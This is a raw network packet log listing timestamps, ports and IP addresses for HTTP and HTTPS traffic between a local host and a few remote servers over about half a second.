Dec 14, 2024 12:56:33.680885077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.680910110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.680939913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.682001114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.682077885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.682126999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.682184935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.683196068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.683286905 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.683357000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.684386969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.684453011 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.684478998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.684533119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.685631990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.685726881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.685735941 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.685834885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.686727047 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.686786890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.686960936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.687017918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.687874079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.687944889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.688028097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.688079119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.689048052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.689101934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.689157009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.689205885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.690232992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.690289021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.690350056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.691411972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.691468954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.691565990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.691622019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.692594051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.692651987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.692709923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.692780018 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.693702936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.693761110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.792988062 CET	443	49835	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:33.793143034 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:33.793582916 CET	443	49835	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:33.793647051 CET	49835	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:33.824806929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.824862957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.824902058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.824999094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.825016975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.825016975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.825114965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.826283932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.826337099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.826392889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.827291012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.827451944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.827505112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.828372002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.828425884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.828500032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.828551054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.829545021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.829596996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.829670906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.829720974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.830746889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.830826044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.830872059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.830904961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.831952095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.832099915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.832154036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.833106041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.833163023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.833230972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.833297968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.834254026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.834306955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.834388971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.834439993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.835484982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.835587025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.835587978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.835635900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.836628914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.836852074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.836906910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.837833881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.838011026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.838064909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.839040995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.839096069 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.839167118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.839217901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.840243101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.840296030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.840377092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.840429068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.841423035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.841480970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.841561079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.841609001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.842586994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.842637062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.842710018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.842758894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.843808889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.843866110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.843955040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.844003916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.845067978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.845192909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.845240116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.845241070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.846085072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.846138000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.846210957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.846261024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.847182989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.847248077 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.847337961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.847390890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.848396063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.848532915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.848591089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.849603891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.849658012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.849730015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.849781036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.850838900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.850874901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.850929022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.851939917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.852009058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.852010965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.852062941 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.853081942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.853157043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.853221893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.853271961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.854279995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.854342937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.854429960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.854479074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.855504036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.855587006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.855639935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.856654882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.856718063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.856779099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.856931925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.857794046 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.857846975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.858026028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.858205080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.859011889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.859064102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.859112024 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.859158993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.860183001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.860281944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.860331059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.861331940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.861386061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.861448050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.861493111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.862548113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.862607002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.862652063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.863709927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.863770962 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.863831043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.863878965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.864968061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.865020990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.865089893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.866045952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.866105080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.866153002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.866205931 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.867228985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.867361069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.867419004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.868405104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.868516922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.868556023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.868604898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.869595051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.869647026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.869709969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.869874001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.870755911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.870806932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.870839119 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.870888948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.871177912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:33.871342897 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:33.871396065 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:33.871947050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.872041941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.872106075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.872597933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:33.873105049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.873217106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.873274088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.874280930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.874346972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.874408007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.874468088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.875479937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.875536919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.875581026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.875627995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.876631021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.876683950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.876766920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.876817942 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.878097057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.878154993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.878184080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.878247976 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.878968954 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.879046917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.879096985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.879149914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.880194902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.880321026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.880376101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.881320000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.881373882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.881458998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.881509066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.882589102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.882734060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.882787943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.883733988 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.883788109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.883795023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.883840084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.885063887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.885122061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.885165930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.885214090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.886029005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.886086941 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.936505079 CET	443	49836	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:33.936517000 CET	443	49836	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:33.936578035 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:33.937100887 CET	443	49836	142.250.181.78	192.168.2.4
Dec 14, 2024 12:56:33.937268972 CET	49836	443	192.168.2.4	142.250.181.78
Dec 14, 2024 12:56:33.992412090 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.016650915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.016706944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.016987085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.017131090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.017263889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.017263889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.018136024 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.018208027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.018253088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.018400908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.019419909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.019474983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.019479990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.019530058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.020514011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.020572901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.020616055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.020692110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.021713972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.021841049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.021915913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.022851944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.022912025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.022984982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.023144007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.024018049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.024092913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.024166107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.024219036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.025218964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.025290012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.025362968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.025527000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.026361942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.026434898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.026496887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.026568890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.027617931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.027726889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.027740002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.027776957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.028714895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.028856993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.028881073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.029011965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.029902935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.029963017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.029973030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.030030012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.031128883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.031183958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.031251907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.032305002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.032361031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.032382011 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.032413006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.033435106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.033499002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.033585072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.033641100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.034653902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.034713984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.034713984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.034761906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.035789967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.035855055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.035906076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.035959005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.037034035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.037087917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.037097931 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.037138939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.038146973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.038266897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.038326025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.039407015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.039443016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.039458990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.039493084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.040487051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.040607929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.040622950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.040697098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.041738987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.041812897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.041915894 CET	80	49827	185.215.113.16	192.168.2.4
